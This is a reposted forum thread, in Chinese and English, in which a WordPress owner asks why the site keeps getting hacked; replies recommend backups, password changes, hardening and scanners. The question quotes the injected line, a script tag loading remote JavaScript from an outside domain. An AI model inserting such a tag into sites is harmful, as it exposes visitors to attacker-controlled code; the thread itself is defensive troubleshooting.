WordPress 网站再次被黑

发布于 2024-12-20 02:40:15 字数 427 浏览 1 评论 0原文

网站已经被黑客攻击两次了,同样的问题我一直必须下载网站并进行查找和替换来修复它,但似乎并没有解决我的问题

这是他们在 WordPress 的 index.php 文件中插入的代码它确实将权限设置为 644。

<script language="javascript" src="http://a.doubleadserver.com/?campaignid=135324812&type=tracking"></script>

我认为这可能是 sql 注入,因为所有文件和文件夹都被锁定到正确的权限 644 755 等。

有人可以告诉我一个我可以用来测试的 mac SQL 注入测试工具,我已阅读另一篇文章,并将我的所有 ftp 帐户更改为 sftp 以确保这一点,我还缺少其他内容吗?

谢谢

Website has been hack twice now with the same issue i keep have to download the website and do a find and replace which fixes it but doesn't seem to solve my problem

this is the code they are inserting in the index.php file in wordpress which does have permissions set to 644.

<script language="javascript" src="http://a.doubleadserver.com/?campaignid=135324812&type=tracking"></script>

I am thinking it maybe a sql injection because all the files and folders are locked to the correct permissions 644 755 etc.

can somebodt tell me a mac SQL Injection test tool that i can use to test, i have been read another post and have change all my ftp accounts to sftp to secure that, is their anything else i am missing?

thanks

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

长亭外,古道边 2024-12-27 02:40:15

查找和替换并不是解决此问题的好方法,因为很容易错过您不知道要具体查找的内容。恢复干净的备份是最好的方法。使用 av 防病毒插件可以提供帮助。最后的手段是通过 xml 导出导出您的内容并重新开始。 。 。

专业提示:

在不应该出现的位置查找 PHP 文件,例如在上传文件夹中,其中应该只有 index.php 文件夹,并且其中应该只有“// Silence is gold”c 消息。如果那里还有其他 PHP 文件。 。 。

祝你好运!

Find and replace is not such a great way to fix this as it's so easy to miss the things you don't know to specifically find. A restore of a clean back up is the best way. Using a v anti-virus plugin can help. The last resort is to export your content via xml export and start all over . . .

Pro tip:

Look for PHP files where they shouldn't be, like in the uploads folder there should only be the index.php folder in there and it should only have the "// Silence is golden" c message in it. If there is any other PHP file in there . . .

Good luck!

柳絮泡泡 2024-12-27 02:40:15

这里有很多可用的工具,分为 2 个部分;在线及下载:
http://www.malwarehelp.org /freeware-open-source-commercial-website-security-tools-services-downloads.html

您也可以在 Mac 上使用此工具,但需要基本的 Perl 安装。
http://www.cirt.net/nikto2

There are many tools available here under 2 sections; Online and Download:
http://www.malwarehelp.org/freeware-open-source-commercial-website-security-tools-services-downloads.html

You can use this one on your mac too but it requires basic Perl installation.
http://www.cirt.net/nikto2

明媚如初 2024-12-27 02:40:15

他们的入口点几乎肯定不是 FTP。这几乎可以通过 WordPress 本身的漏洞或简单密码的密码破解来证明。

如果您要修复黑客而不是恢复备份。你做错了。制作并存储增量备份,每周一次就可以了,具体取决于您更新内容的频率。不要忘记备份数据库,事实上这是最重要的。您随时可以重新上传图像或插件等。Sooooo

......
第一步:恢复网站
第二步:将密码更改为安全密码
第三步:使用安全插件加固网站
第四步:设置自动备份。

祝你好运!

Their entry point is almost certainly not FTP. It's almost certifiably via a vulnerability in WordPress itself or a password hack of an easy password.

If you are fixing the hack instead of restoring a backup. You are doing it wrong. Make and store incremental backups, once a week should do it, depending on how often you update your content. Don't forget to back up the database, in fact it's the most important. You can always re upload an image or a plugin etc.

Sooooo....
Step one: Restore website
Step two: Change password to secure ones
Step three: Harden website with security plug ins
Step four: Set up automated backups.

Good Luck!

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文